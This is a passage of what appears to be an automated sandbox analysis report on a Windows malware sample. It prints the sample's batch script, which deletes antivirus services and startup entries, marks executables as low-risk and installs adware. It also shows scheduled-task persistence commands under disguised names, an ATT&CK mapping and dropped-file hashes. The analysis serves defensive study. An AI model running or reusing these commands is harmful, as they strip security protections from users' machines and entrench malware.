"HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )4⤵
-
C:\Users\Admin\AppData\Local\Temp\8D54.exeC:\Users\Admin\AppData\Local\Temp\8D54.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\8D54.exeC:\Users\Admin\AppData\Local\Temp\8D54.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 14643⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\90B1.exeC:\Users\Admin\AppData\Local\Temp\90B1.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\949A.exeC:\Users\Admin\AppData\Local\Temp\949A.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\ProgramData\Templates\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\SetupMetrics\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\ProgramData\Mozilla\updates\308046B0AF4A39CB\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Modify Registry
3Disabling Security Tools
1Virtualization/Sandbox Evasion
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\install.exeMD5
3319cb474eaa2f3812956b271ff29635
SHA174fbed926e8de14fa5eb6a5a47fb873def72fb81
SHA25679d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a
SHA512c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347
-
C:\ProgramData\Data\install.exeMD5
3319cb474eaa2f3812956b271ff29635
SHA174fbed926e8de14fa5eb6a5a47fb873def72fb81
SHA25679d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a
SHA512c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347
-
C:\ProgramData\Runtimebroker.exeMD5
41c30885a9306086f05f6935fbc51753
SHA1f8b1e1d1bea0c149ffc871e31c87c4f463122960
SHA256206c1ae51b4cb137795296086fdce9238bb4ace5f1c6d3ad61780d5071253639
SHA5120d8708730bceea15a478d3b3a36cdb93b2ab53cc14c311d9ae19ebb9a39394a97e75ec2814b78702ec1a529198c719937c2e43a9eece94d8c352f18842f2dc47
-
C:\ProgramData\Runtimebroker.exeMD5
41c30885a9306086f05f6935fbc51753
SHA1f8b1e1d1bea0c149ffc871e31c87c4f463122960
SHA256206c1ae51b4cb137795296086fdce9238bb4ace5f1c6d3ad61780d5071253639
SHA5120d8708730bceea15a478d3b3a36cdb93b2ab53cc14c311d9ae19ebb9a39394a97e75ec2814b78702ec1a529198c719937c2e43a9eece94d8c352f18842f2dc47
-
C:\ProgramData\Systemd\HostData.exeMD5
cbf26c74a0a12b5f17ba7596ff6ad19f
SHA16dc733432c290f1fbf5ddda2571b7f538445202b
SHA256095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983
SHA5128a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b
-
C:\ProgramData\Systemd\HostData.exeMD5
cbf26c74a0a12b5f17ba7596ff6ad19f
SHA16dc733432c290f1fbf5ddda2571b7f538445202b
SHA256095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983
SHA5128a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b
-
C:\ProgramData\Systemd\config.jsonMD5
a285ac140c8c6806223bfdc02302173e
SHA106ca61cae058c568860858e49615d04dc4a8820d
SHA25636d5713cc13ea15449ab8defc943e42cc657b503a79f0859600ea275598441eb
SHA512f82eae8304aa9ba504eba0e96468fdac08420b0e158c3263a4f47474b02fb5f751b1bd2335e71a33341d81a495083c7dd8e0479e2c48dbaf6a3f7fefb9f4054b
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
6bf0e5945fb9da68e1b03bdaed5f6f8d
SHA1eed3802c8e4abe3b327c100c99c53d3bbcf8a33d
SHA256dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1
SHA512977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
1bf73c53f6bfde488dc08e3d646ffb0e
SHA17d514fae8c9d930a2248d8ea0401e75b6bebfee4
SHA25611120a80ad791590cb2e1b073f9bda3d391328faf84b1b1304afa59283c92957
SHA512e5e57910bb1cfba780d67e29d94db8f59357ba2095b5be69ae2cdbd52c81e704ab69dcab593d3ddcb08083b8dee621a6734f5a4cfba7b4c9484efa4edb183f1d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
ddb717126b617023f46894eafb19e9d4
SHA1871e44c3f8cb8c00c7ca1b3cb38ae2a4609d8204
SHA25694ec223f3326912a083b27d4c7b35e214b991c3ed8b621be4996b4707844eaae
SHA5125a70b78126925a90ebf9264dda94047688e8b7472a1d6a8dc616e435b69502de95186749b1100e1c04cad85093cd06834055acbc7454cd61995ab732367e99f0
-
C:\Users\Admin\AppData\Local\Temp\7B11.exeMD5
e987477b0d14b6d7075f0105aa28ba92
SHA154bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab
SHA2564fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b
SHA512bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68
-
C:\Users\Admin\AppData\Local\Temp\7B11.exeMD5
e987477b0d14b6d7075f0105aa28ba92
SHA154bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab
SHA2564fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b
SHA512bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68
-
C:\Users\Admin\AppData\Local\Temp\7B11.exeMD5
e987477b0d14b6d7075f0105aa28ba92
SHA154bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab
SHA2564fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b
SHA512bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68
-
C:\Users\Admin\AppData\Local\Temp\85C1.exeMD5
49f58a80993170b4351014d0b5068897
SHA17af2615ec10821cbefb55c602b270c27fa1d6806
SHA256905f70426483e7dc4e4d2110cfa0f3a3bbac1ee16a74e287cd51cae0e0babd1c
SHA5122ee7f30ee68bbc9da4f3858d1eb188be3fca547f63b36864181b86a70ea5d06f614fdb38b42a22aff24e8d4d720f814b6b103e52d5c01c399eefd28775f88ae2
-
C:\Users\Admin\AppData\Local\Temp\85C1.exeMD5
49f58a80993170b4351014d0b5068897
SHA17af2615ec10821cbefb55c602b270c27fa1d6806
SHA256905f70426483e7dc4e4d2110cfa0f3a3bbac1ee16a74e287cd51cae0e0babd1c
SHA5122ee7f30ee68bbc9da4f3858d1eb188be3fca547f63b36864181b86a70ea5d06f614fdb38b42a22aff24e8d4d720f814b6b103e52d5c01c399eefd28775f88ae2
-
C:\Users\Admin\AppData\Local\Temp\8A56.exeMD5
41c30885a9306086f05f6935fbc51753
SHA1f8b1e1d1bea0c149ffc871e31c87c4f463122960
SHA256206c1ae51b4cb137795296086fdce9238bb4ace5f1c6d3ad61780d5071253639
SHA5120d8708730bceea15a478d3b3a36cdb93b2ab53cc14c311d9ae19ebb9a39394a97e75ec2814b78702ec1a529198c719937c2e43a9eece94d8c352f18842f2dc47
-
C:\Users\Admin\AppData\Local\Temp\8A56.exeMD5
41c30885a9306086f05f6935fbc51753
SHA1f8b1e1d1bea0c149ffc871e31c87c4f463122960
SHA256206c1ae51b4cb137795296086fdce9238bb4ace5f1c6d3ad61780d5071253639
SHA5120d8708730bceea15a478d3b3a36cdb93b2ab53cc14c311d9ae19ebb9a39394a97e75ec2814b78702ec1a529198c719937c2e43a9eece94d8c352f18842f2dc47
-
C:\Users\Admin\AppData\Local\Temp\8D54.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
